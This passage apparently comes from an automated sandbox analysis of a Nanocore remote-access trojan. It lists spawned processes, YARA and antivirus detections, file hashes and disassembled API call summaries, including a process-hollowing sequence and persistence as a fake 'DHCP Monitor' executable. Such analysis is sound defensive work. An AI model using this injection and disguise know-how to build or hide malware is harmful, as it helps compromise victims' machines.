                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.231711637.00000000010FD000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.231711637.00000000010FD000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.231711637.00000000010FD000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  Reputation: low

                                                  General

                                                  Start time: 07:24:10
                                                  Start date: 20/11/2020
                                                  Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                  Wow64 process (32bit): true
                                                  Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                  Imagebase: 0x7ff7488e0000
                                                  File size: 53248 bytes
                                                  MD5 hash: 529695608EAFBED00ACA9E61EF333A7C
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: .Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.249609796.0000000000402000.00000020.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.249609796.0000000000402000.00000020.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.249609796.0000000000402000.00000020.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.250629843.0000000004451000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.250629843.0000000004451000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.250595233.0000000003451000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.250595233.0000000003451000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Reputation: high

                                                  General

                                                  Start time: 07:24:21
                                                  Start date: 20/11/2020
                                                  Path: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                  Wow64 process (32bit): true
                                                  Commandline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
                                                  Imagebase: 0x500000
                                                  File size: 53248 bytes
                                                  MD5 hash: 529695608EAFBED00ACA9E61EF333A7C
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: .Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 0%, Metadefender
                                                  • Detection: 0%, ReversingLabs
                                                  Reputation: high

                                                  General

                                                  Start time: 07:24:21
                                                  Start date: 20/11/2020
                                                  Path: C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit): false
                                                  Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase: 0x7ff6b2800000
                                                  File size: 625664 bytes
                                                  MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: C, C++ or other language
                                                  Reputation: high

                                                  Disassembly

                                                  Code Analysis


                                                    Executed Functions

                                                    APIs
                                                    • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 038D02E7
                                                    • GetThreadContext.KERNELBASE(?,00010007), ref: 038D02FC
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 038D031C
                                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 038D034A
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 038D0367
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000000), ref: 038D049B
                                                    • VirtualProtectEx.KERNELBASE(?,?,?,00000002,?), ref: 038D04B5
                                                    • VirtualProtectEx.KERNELBASE(?,?,?,00000001,?), ref: 038D051C
                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 038D053E
                                                    • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 038D055D
                                                    • SetThreadContext.KERNELBASE(?,00010007), ref: 038D057E
                                                    • ResumeThread.KERNELBASE(?), ref: 038D058C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.211922744.00000000038D0000.00000040.00000001.sdmp, Offset: 038D0000, based on PE: false
                                                    Similarity
                                                    • API ID: Virtual$Process$MemoryThread$AllocContextProtectWrite$CreateFreeReadResume
                                                    • String ID:
                                                    • API String ID: 12256240-0
                                                    • Opcode ID: f12a0e3ec3a1dc5db5e035ccf4192a676492458e181c44b55a32febd4ba72111
                                                    • Instruction ID: 12b9c41b9fab8c4745d3e05e54124a090a02469fef686c23b373b31c2b523749
                                                    • Opcode Fuzzy Hash: f12a0e3ec3a1dc5db5e035ccf4192a676492458e181c44b55a32febd4ba72111
                                                    • Instruction Fuzzy Hash: CBF113B1D00219ABDB25CFA5C844BAEFBB9FF48704F1844A9E949E7240D730AA84CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Executed Functions

                                                    APIs
                                                    • RtlEncodePointer.NTDLL(00000000), ref: 003E33CA
                                                      • Part of subcall function 003EA764: EncodePointer.KERNEL32(003EA730,0047BE68,00000008,003F4D5C), ref: 003EA769
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003EA0E0
                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003EA0F4
                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003EA107
                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003EA11A
                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003EA12D
                                                    • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003EA140
                                                    • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 003EA153
                                                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 003EA166
                                                    • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 003EA179
                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 003EA18C
                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 003EA19F
                                                    • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003EA1B2
                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003EA1C5
                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003EA1D8
                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003EA1EB
                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003EA1FE
                                                    • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 003EA211
                                                    • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 003EA224
                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 003EA237
                                                    • GetProcAddress.KERNEL32(00000000,GetLogicalProcessorInformation), ref: 003EA24A
                                                    • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 003EA25D
                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 003EA270
                                                    • GetProcAddress.KERNEL32(00000000,EnumSystemLocalesEx), ref: 003EA283
                                                    • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 003EA296
                                                    • GetProcAddress.KERNEL32(00000000,GetDateFormatEx), ref: 003EA2A9
                                                    • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 003EA2BC
                                                    • GetProcAddress.KERNEL32(00000000,GetTimeFormatEx), ref: 003EA2CF
                                                    • GetProcAddress.KERNEL32(00000000,GetUserDefaultLocaleName), ref: 003EA2E2
                                                    • GetProcAddress.KERNEL32(00000000,IsValidLocaleName), ref: 003EA2F5
                                                    • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 003EA308
                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 003EA31B
                                                    • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 003EA32E
                                                    • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleExW), ref: 003EA341
                                                    • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandleW), ref: 003EA354
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: AddressProc$EncodePointer$HandleModule
                                                    • String ID: CloseThreadpoolTimer$CloseThreadpoolWait$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$EnumSystemLocalesEx$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetDateFormatEx$GetFileInformationByHandleExW$GetLocaleInfoEx$GetLogicalProcessorInformation$GetTickCount64$GetTimeFormatEx$GetUserDefaultLocaleName$InitializeCriticalSectionEx$IsValidLocaleName$LCMapStringEx$SetDefaultDllDirectories$SetFileInformationByHandleW$SetThreadStackGuarantee$SetThreadpoolTimer$SetThreadpoolWait$WaitForThreadpoolTimerCallbacks$kernel32.dll
                                                    • API String ID: 2375030495-2934716456
                                                    • Opcode ID: a8b484b45ecc0505598a9d3194b77d4eb017959633e74b016f0f00d75828b2c2
                                                    • Instruction ID: 387b353ef959ce57a71b5338962a79d178d85e997cdaa8477dad05b60c38f7b1
                                                    • Opcode Fuzzy Hash: a8b484b45ecc0505598a9d3194b77d4eb017959633e74b016f0f00d75828b2c2
                                                    • Instruction Fuzzy Hash: 6861FB71D50719AAC311EFB5EC49F1BBBA8BB55B42714083FA805E3171EAB8A1488F5C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,003C49C2,?), ref: 003C3B7A
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,003C49C2,?), ref: 003C3B8C
                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,004862F8,004862E0,?,?,?,003C49C2,?), ref: 003C3BFD
                                                      • Part of subcall function 003D0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,003C3C26,004862F8,?,?,?,?,003C49C2,?), ref: 003D0ACE
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,003C49C2,?), ref: 003C3C81
                                                    • MessageBoxA.USER32 ref: 003FD4BC
                                                    • SetCurrentDirectoryW.KERNEL32(?,004862F8,?,?,?,?,003C49C2,?), ref: 003FD4F4
                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00475D40,004862F8,?,?,?,?,003C49C2,?), ref: 003FD57A
                                                    • ShellExecuteW.SHELL32(00000000,?,?,?,003C49C2,?), ref: 003FD581
                                                      • Part of subcall function 003C3A58: GetSysColorBrush.USER32(0000000F), ref: 003C3A62
                                                      • Part of subcall function 003C3A58: LoadCursorW.USER32(00000000,00007F00), ref: 003C3A71
                                                      • Part of subcall function 003C3A58: LoadIconW.USER32(00000063), ref: 003C3A88
                                                      • Part of subcall function 003C3A58: LoadIconW.USER32(000000A4), ref: 003C3A9A
                                                      • Part of subcall function 003C3A58: LoadIconW.USER32(000000A2), ref: 003C3AAC
                                                      • Part of subcall function 003C3A58: LoadImageW.USER32 ref: 003C3AD2
                                                      • Part of subcall function 003C3A58: RegisterClassExW.USER32 ref: 003C3B28
                                                      • Part of subcall function 003C39E7: CreateWindowExW.USER32 ref: 003C3A15
                                                      • Part of subcall function 003C39E7: CreateWindowExW.USER32 ref: 003C3A36
                                                      • Part of subcall function 003C39E7: ShowWindow.USER32(00000001,?,?,?,003C49C2,?), ref: 003C3A4A
                                                      • Part of subcall function 003C39E7: ShowWindow.USER32(00000001,?,?,?,003C49C2,?), ref: 003C3A53
                                                      • Part of subcall function 003C43DB: Shell_NotifyIconW.SHELL32(?,?), ref: 003C44A6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_
                                                    • String ID: This is a third-party compiled AutoIt script.$runas$%E
                                                    • API String ID: 1385234928-2935453162
                                                    • Opcode ID: 8fbe75436a3788f1b020ea4d992c9c781732a2f4be72c078ce3c5eabf9f0cc2d
                                                    • Instruction ID: 22f44a614ed3e93f732d8a7ae0a2294c50666b04d36785a3e15ef66cfe215468
                                                    • Opcode Fuzzy Hash: 8fbe75436a3788f1b020ea4d992c9c781732a2f4be72c078ce3c5eabf9f0cc2d
                                                    • Instruction Fuzzy Hash: 0051D431904248AACB13BBB0EC05FFD7B78AB05300B11C5FEF855EA192CA758E45CB25
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00E302E7
                                                    • GetThreadContext.KERNELBASE(?,00010007), ref: 00E302FC
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E3031C
                                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00E3034A
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 00E30367
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000000), ref: 00E3049B
                                                    • VirtualProtectEx.KERNELBASE(?,?,?,00000002,?), ref: 00E304B5
                                                    • VirtualProtectEx.KERNELBASE(?,?,?,00000001,?), ref: 00E3051C
                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00E3053E
                                                    • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E3055D
                                                    • SetThreadContext.KERNELBASE(?,00010007), ref: 00E3057E
                                                    • ResumeThread.KERNELBASE(?), ref: 00E3058C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000003.232895997.0000000000E30000.00000040.00000001.sdmp, Offset: 00E30000, based on PE: false
                                                    Similarity
                                                    • API ID: Virtual$Process$MemoryThread$AllocContextProtectWrite$CreateFreeReadResume
                                                    • String ID:
                                                    • API String ID: 12256240-0
                                                    • Opcode ID: f12a0e3ec3a1dc5db5e035ccf4192a676492458e181c44b55a32febd4ba72111
                                                    • Instruction ID: d22c3ec7caecec380ba81bd89fc58741df439d16674c51f6c3f19271b573d6ed
                                                    • Opcode Fuzzy Hash: f12a0e3ec3a1dc5db5e035ccf4192a676492458e181c44b55a32febd4ba72111
                                                    • Instruction Fuzzy Hash: 8BF125B1D00219AFDB21CFA5CC58BAEBBB9FF48704F1454A9E959B7250D730AA84CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVersionExW.KERNEL32(?,?,00000000), ref: 003C4B2B
                                                    • GetCurrentProcess.KERNEL32(?,0044FAEC,00000000,00000000,?,?,00000000), ref: 003C4BF8
                                                    • IsWow64Process.KERNEL32(00000000,?,00000000), ref: 003C4BFF
                                                    • GetNativeSystemInfo.KERNELBASE(00000000,?,00000000), ref: 003C4C45
                                                    • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 003C4C50
                                                    • GetSystemInfo.KERNEL32(00000000,?,00000000), ref: 003C4C81
                                                    • GetSystemInfo.KERNEL32(00000000,?,00000000), ref: 003C4C8D
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64
                                                    • String ID:
                                                    • API String ID: 2813406015-0
                                                    • Opcode ID: 75f4517a4e7e5576e8f4d844380b6f255ce5864a3820eb7989f6cbdf5e1b11fe
                                                    • Instruction ID: cd749ab0a88b93f5215938f55f8c6aa7e9932d02ec37bb987f8a9b7c6e4f088a
                                                    • Opcode Fuzzy Hash: 75f4517a4e7e5576e8f4d844380b6f255ce5864a3820eb7989f6cbdf5e1b11fe
                                                    • Instruction Fuzzy Hash: 4191E53544A7C4DEC732DB789965AABBFE5AF26300B444D5EE1CBD3A01D220ED08C729
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003C48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003C48A1,?,?,003C37C0,?,00000000,00000001), ref: 003C48CE
                                                      • Part of subcall function 00424CD3: GetFileAttributesW.KERNELBASE(?,004253F4), ref: 00424CD4
                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00423DC5
                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00423E15
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00423E26
                                                    • FindClose.KERNEL32(00000000), ref: 00423E3D
                                                    • FindClose.KERNEL32(00000000), ref: 00423E46
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                    • String ID: \*.*
                                                    • API String ID: 2649000838-1173974218
                                                    • Opcode ID: b1fe2c7f450679c1e58edd501c4fbf01b76b7c523c99098a2a96cacf527ae1bc
                                                    • Instruction ID: 783887d69bd4e5896128145739be46e97ed5856d33e2c0d10c8dd688f6f8ad8c
                                                    • Opcode Fuzzy Hash: b1fe2c7f450679c1e58edd501c4fbf01b76b7c523c99098a2a96cacf527ae1bc
                                                    • Instruction Fuzzy Hash: 98316132109355AFC202EF60EC91DEF77A8BE96311F444D2EF4D186191DB299E0DCB66
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003C4EEE,?,?,00000000,00000000), ref: 003C4FF9
                                                    • FindResourceExW.KERNEL32(00000000,0000000A,SCRIPT,00000000,00000000,?,003C4EEE,?,?,00000000,00000000), ref: 003C5010
                                                    • LoadResource.KERNEL32(00000000,00000000,?,003C4EEE,?,?,00000000,00000000), ref: 003FDD60
                                                    • SizeofResource.KERNEL32(00000000,00000000,?,003C4EEE,?,?,00000000,00000000), ref: 003FDD75
                                                    • LockResource.KERNEL32(?,?,003C4EEE,?,?,00000000,00000000), ref: 003FDD88
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                    • String ID: SCRIPT
                                                    • API String ID: 3051347437-3967369404
                                                    • Opcode ID: da790a4b6dc60d67f7b9072eaf56402568bc6afd606db32857ca7080b7b27902
                                                    • Instruction ID: d05a054017d63742884f93fe59baf761943aacf10a3130e1115458bf4ac85b5a
                                                    • Opcode Fuzzy Hash: da790a4b6dc60d67f7b9072eaf56402568bc6afd606db32857ca7080b7b27902
                                                    • Instruction Fuzzy Hash: 7A114CB6240710BFE7218B64EC49F677B7DEBC6B51F10426DF105C5160CB62B8448675
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00423EB6
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00423EC4
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00423EE4
                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00423F8E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3243318325-0
                                                    • Opcode ID: 4e0453a96590fba92540cddffe521d84c7ebf3e5b67e9b6e802879fe04fff520
                                                    • Instruction ID: 47eb147b20222699f2c7b7dfff354cb1d48b12d2a36f155d2d39897da047eeb2
                                                    • Opcode Fuzzy Hash: 4e0453a96590fba92540cddffe521d84c7ebf3e5b67e9b6e802879fe04fff520
                                                    • Instruction Fuzzy Hash: 85319E722083059FD305EF60E885FBFBBF8EF85354F50052EF481861A0DB65AA48CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,?), ref: 004246A6
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004246B7
                                                    • FindClose.KERNEL32(00000000), ref: 004246C7
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: FileFind$AttributesCloseFirst
                                                    • String ID:
                                                    • API String ID: 48322524-0
                                                    • Opcode ID: 91afc3f0cef84e30f4f2a76764fa1490730b38a98297f90945761989094c8c6d
                                                    • Instruction ID: 8a1c7480f135066d63a62957eb2bbf1a1ae4cd02e7fd44e20b9351b85e8e804f
                                                    • Opcode Fuzzy Hash: 91afc3f0cef84e30f4f2a76764fa1490730b38a98297f90945761989094c8c6d
                                                    • Instruction Fuzzy Hash: 9AE0DF3A604920AB92106738FC4D8EB7F5CEE473B6F500722F939C04E0E779A554C5AE
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: prH$%E
                                                    • API String ID: 3964851224-3746577361
                                                    • Opcode ID: 5a8ebf8bd6c716a88ad1ffa352a01cf5c1fbc145480f3aad13705b1cd20201b1
                                                    • Instruction ID: abd438bbeebfe46239e0a9344dfbe0d10f4ca70fb481ce1be1265f994874a14d
                                                    • Opcode Fuzzy Hash: 5a8ebf8bd6c716a88ad1ffa352a01cf5c1fbc145480f3aad13705b1cd20201b1
                                                    • Instruction Fuzzy Hash: 6C92A8B16083419FD726CF24D480B2ABBE4BF84704F15892EF98A9B391D774EC45CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • PeekMessageW.USER32 ref: 003D0BBB
                                                    • timeGetTime.WINMM ref: 003D0E76
                                                    • PeekMessageW.USER32 ref: 003D0FB3
                                                    • TranslateMessage.USER32(?), ref: 003D0FC7
                                                    • DispatchMessageW.USER32 ref: 003D0FD5
                                                    • Sleep.KERNELBASE(0000000A), ref: 003D0FDF
                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 003D105A
                                                    • DestroyWindow.USER32 ref: 003D1066
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003D1080
                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 004052AD
                                                    • TranslateMessage.USER32(?), ref: 0040608A
                                                    • DispatchMessageW.USER32 ref: 00406098
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004060AC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$prH$prH$prH$prH
                                                    • API String ID: 4003667617-658207505
                                                    • Opcode ID: 2b88478c9013bc2ddd77381d48e8d944c8a516ea9754c5fea264b0a510bb8d0e
                                                    • Instruction ID: d5329eb5acc959eb07caa98da41f86582fc92bd13af5a0869e6cad6061caeef2
                                                    • Opcode Fuzzy Hash: 2b88478c9013bc2ddd77381d48e8d944c8a516ea9754c5fea264b0a510bb8d0e
                                                    • Instruction Fuzzy Hash: 54B2DF71608741DFD729DB24D884BABB7E4FF80304F14492EE5899B291CB79E884CF96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetForegroundWindow.USER32(0044F910,00000001,00000000,?,?,?), ref: 003D6042
                                                    • IsWindow.USER32(00000000), ref: 00410FFA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Window$Foreground
                                                    • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                    • API String ID: 62970417-1919597938
                                                    • Opcode ID: b1f32ef6f01fd1adcf41123fe48aa96101f243b66a792e24c5cf21869e5e2082
                                                    • Instruction ID: 20cd9fa3403e071a9b33bbfc83c805d9e8aed62e7123d521c70cfb7fb68a9d8e
